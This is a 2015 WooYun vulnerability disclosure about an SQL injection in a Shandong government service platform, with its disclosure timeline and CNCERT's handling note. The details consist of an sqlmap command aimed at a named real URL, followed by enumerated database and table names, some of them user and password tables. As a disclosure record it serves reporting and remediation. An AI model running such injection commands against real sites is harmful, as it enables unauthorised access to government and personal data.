当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0105966

漏洞标题:山东省政府某服务平台注入,曝出大量信息

相关厂商:cncert国家互联网应急中心

漏洞作者: 小天

提交时间:2015-04-08 11:33

修复时间:2015-05-25 18:42

公开时间:2015-05-25 18:42

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-08: 细节已通知厂商并且等待厂商处理中
2015-04-10: 厂商已经确认,细节仅向厂商公开
2015-04-20: 细节向核心白帽子及相关领域专家公开
2015-04-30: 细节向普通白帽子公开
2015-05-10: 细节向实习白帽子公开
2015-05-25: 细节向公众公开

简要描述:

真是服了,,一个数据库,竟然有216张表,弄了我几个小时,数据就不爆了,太累了

详细说明:

注入点: http://flfw.smesd.gov.cn/clist.jsp?id=331

sqlmap.py  -u http://flfw.smesd.gov.cn/clist.jsp?id=331  --dbs
available databases [26]:
[*] APEX_030200
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] EXFSYS
[*] FLOWS_FILES
[*] HR
[*] IX
[*] MDSYS
[*] OE
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] PM
[*] SCOTT
[*] SH
[*] SHUJUTONGBU
[*] SMESDUSER
[*] SOE
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB
Database: SMESDUSER
[213 tables]
+--------------------------------+
| CMS_PLTFH>S_FAN@TANROLE |
| QYREG\\ZZH |
| ABOUT_ZB |
| ARTICL@ |
| ARTICLECESHI |
| ARTICLECLASS_DY |
| ARTICLECLASS_LCH |
| ARTICLECLASS_LK |
| ARTICLECLASS_YG |
| ARTICLECLASS_YZH |
| ARTICLE_DY |
| ARTICLE_LCH |
| ARTICLE_LK |
| ARTICLE_SNP_ |
| ARTICLE_YG |
| ARTICLE_YZH |
| BIGCLASS_ABOUT_ZB |
| BIGCLASS_BZ |
| BIGCLASS_DZH |
| BIGCLASS_HC |
| BIGCLASS_JNING |
| BIGCLASS_NEWS_ZB |
| BIGCLASS_QY |
| BIGCLASS_WH |
| BIGCLASS_ZZH |
| BIZ_JIGOPRENDINGCESHI2 |
| BIZ_JIGOURENDING |
| BIZ_JIGOURENDINGCESHI |
| BIZ_JIGOURENDINGFUWU |
| BIZ_JIGOURENDINGSHENPI |
| CHANNEL |
| CLASS_FLFW |
| CLS_WEBSITE_PAGECONTENT |
| CMSHSERVER_RESULT |
| CMS_ARSICLE_ARTICLEHISTORY |
| CMS_ARTICLE_ARTICLE |
| CMS_ARTICLE_ARTICLE2 |
| CMS_ARTICLE_ARTICLE99 |
| CMS_ARTICLE_ARTICLELINK |
| CMS_ARTICLE_CONTENT |
| CMS_ARTICLE_CONTENT99 |
| CMS_ARTICLE_GAOCAIYONG |
| CMS_ARTICLE_GAOJIAN |
| CMS_ARTICLE_LANMU |
| CMS_ARTICLE_PINGLUN |
| CMS_ARTICLE_TAG |
| CMS_ARTICLE_ZHUANTI |
| CMS_ARTICLE_ZHUANTILANMU |
| CMS_FILE_FILES |
| CMS_FILE_IMG |
| CMS_FILE_MEDIA |
| CMS_FILE_ZHUANJI |
| CMS_MESSAGE_SHORTMESSAGE |
| CMS_PLUGIHS_JIANCEJIA@U |
| CMS_PLUGILS_DIAOCHAJIEGUO |
| CMS_PLUGINS_CHAT |
| CMS_PLUGINS_DIAOCHA |
| CMS_PLUGINS_DIAOCHASHIX |
| CMS_PLUGINS_DIAOCHAYONGHU |
| CMS_PLUGINS_DIAOCHAZU |
| CMS_PLUGINS_F@NGTAN |
| CMS_PLUGINS_FANGTANCONTEN@ |
| CMS_PLUGINS_FANGTANPINGLUN |
| CMS_PLUGINS_FRIENDLINK |
| CMS_PLUGINS_GUESTBOOK |
| CMS_PLUGINS_GUESTREPLY |
| CMS_PLUGINS_JIANCEDA@UAN |
| CMS_PLUGINS_JIANCEFAGNZHI |
| CMS_PLUGINS_JIANCELVCAI |
| CMS_PLUGINS_JIANCESTATE |
| CMS_PLUGINS_JIANCEWIANGMU |
| CMS_PLUGINS_TONGJI |
| CMS_PLUGINS_ZFENGJI |
| CMS_PLUGINS_ZHENGJIJIANYI |
| CMS_PNRTAL_FUWUJIGOU |
| CMS_PORTAL@COMPWDREC |
| CMS_PORTAL_@UWUJIGOUZIZHI |
| CMS_PORTAL_COLRIGHT |
| CMS_PORTAL_COLZHENGJIAN |
| CMS_PORTAL_COMINDUSTRYCO |
| CMS_PORTAL_COMPANY |
| CMS_PORTAL_DEPARTMENT |
| CMS_PORTAL_EMPLOYEE |
| CMS_PORTAL_JIGOUECONOMIC |
| CMS_PORTAL_JIGOUMAINPEOPLE |
| CMS_PORTAL_JIGOUPERSONNEL |
| CMS_PORTAL_JIGOURELATION |
| CMS_PORTAL_JIGOURENDING |
| CMS_PORTAL_JIGOUSERVERTYPE |
| CMS_PORTAL_JIGOUSERVICECOM |
| CMS_PORTAL_JIGOUSHEBEI |
| CMS_PORTAL_JIGOUSHENPI |
| CMS_PORTAL_JISHUCHENGGUO |
| CMS_PORTAL_MEMBER |
| CMS_PORTAL_ORG |
| CMS_PORTAL_PASSWORDRECORD |
| CMS_PORTAL_PRNJECTNANTI |
| CMS_PORTAL_RESOURCE |
| CMS_PORTAL_RESOURCEROLE |
| CMS_PORTAL_ROLE |
| CMS_PORTAL_SERVICEWAYORTAG |
| CMS_PORTAL_USER |
| CMS_PORTAL_USERCHECK |
| CMS_PORTAL_USERINFO |
| CMS_PORTAL_USERRENZHENG |
| CMS_PORTAL_ZHUANJIA |
| CMS_PORTAL_ZHUANJIALINGYU |
| CMS_RERVER_SERVICEAPPLY |
| CMS_SAFE_GETP@SSWORD |
| CMS_SAFE_LOGINLOG |
| CMS_SAFE_ONLINE |
| CMS_SAFE_UPDATELOG |
| CMS_SERVER_JIGOUREQUIRE |
| CMS_SERVER_PROJECT |
| CMS_SERVER_PROJECTMODEL |
| CMS_SERVER_REQUIREMENT |
| CMS_SERVER_SERVERWAYOBJ |
| CMS_SERVER_SERVICEJIAOHU |
| CMS_SNS_FRIENDS |
| CMS_SYS_CITY |
| CMS_SYS_GONGFAO |
| CMS_SYS_OPLOG |
| CMS_SYS_SENSITIVEWORDS |
| CMS_SYS_SITEKINDS |
| CMS_SYS_SYSKINDS |
| CMS_SYS_SYSPAGE |
| CMS_WEBSITE_AD |
| CMS_WEBSITE_ADCONTENT |
| CMS_WEBSITE_ADKI@D |
| CMS_WEBSITE_MODEL |
| CMS_WEBSITE_MODELPAGE |
| CMS_WEBSITE_SITE |
| CMS_WEBSITE_SITEADMIN |
| CMS_WEBSITE_STYLE |
| CMS_WEBSITE_SYSTAG |
| CMS_WEBSITE_TAGMODEL |
| CONTENT |
| DESTOON_@OMPANY_DATA_FLZXXH |
| DESTOON_ARTICLE_21_GLZXXH |
| DESTOON_ARTICLE_DATA_21_GLZXXH |
| DESTOON_CASEGORY_GLZPXH |
| DESTOON_COMPANY_GLZXXH |
| DESTOON_DOWN_DATA_GLZXX@ |
| DESTOON_DOWN_GLZXXH |
| DESTOON_MEMBER_GLZXXH |
| DESTOON_VIDEO_DATA_GLZXXH |
| DESTOON_VIDEO_GLPXXH |
| ENTERCLASS_LCH |
| ENTERCLASS_WH |
| ENTERPRISE_LCH |
| ENTERPRISE_WH |
| EXLERT_JSCX |
| GUEST_FLFW |
| JB@COLUMN_YT |
| LANMU_LINQ |
| LANMU_QZH |
| LANMU_WFWCH |
| MEMBER_WF |
| NB_COLUMN_WF |
| NB_CONTDNT_WF |
| NB_CONTENT_YT |
| NETOS_BLOCK_HZ |
| NETOS_MCOMPANY_HZ |
| NETOS_MODP_HZ |
| NETOS_MOVIE_HZ |
| NETOS_NEWS_HZ |
| NETOS_PRODUCT_HZ |
| NETOS_REGB_HZ |
| NEWSCLASS_LY |
| NEWSCOLUMN_JSCP |
| NEWSCOLUMN_TZH |
| NEWSPAGE_JSCX |
| NEWSPAGE_TZH |
| NEWS_BZ |
| NEWS_DLFW |
| NEWS_DZH |
| NEWS_HC |
| NEWS_JNING |
| NEWS_LINQ |
| NEWS_LY |
| NEWS_QY |
| NEWS_QZH |
| NEWS_SX |
| NEWS_WFWCH |
| NEWS_WH |
| NEWS_ZA |
| OLD_PORTAL_ORG |
| PICNEW_LCH |
| PRODUCT_BZ |
| PRODUCT_LY |
| PRODUCT_ZZH |
| PROJBCTCLASS_JSCX |
| PROJECTPAGE_JSCX |
| REPLY_FLFW |
| SD_T_CATALOGUE |
| SM@LLCLASS_ZZH |
| SMALLCLASS_BZ |
| SMALLCLASS_DZH |
| SMALLCLASS_HC |
| SMALLCLASS_JNING |
| SMALLCLASS_QY |
| SMALLCLASS_WH |
| STUDENT |
| TEACHER |
| TECHNOLOGY_JSCX |
| TEST_CLO@ |
| WEBNEWS_ZZH |
| YMUBIAO |
| ZHC@S_BZ |
| ZHCTS_JNING |
| ZHCTS_WH |
| Z_SD_T_SERVER_BASIC_SNP_ |
| Z_SD_V_CODE |
+--------------------------------+

漏洞证明:

rt

修复方案:

过滤

版权声明:转载请注明来源 小天@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-04-10 18:40

厂商回复:

已经转由CNCERT下发给相应分中心,由其后续协调网站管理单位处置

最新状态:

暂无


漏洞评价:

评论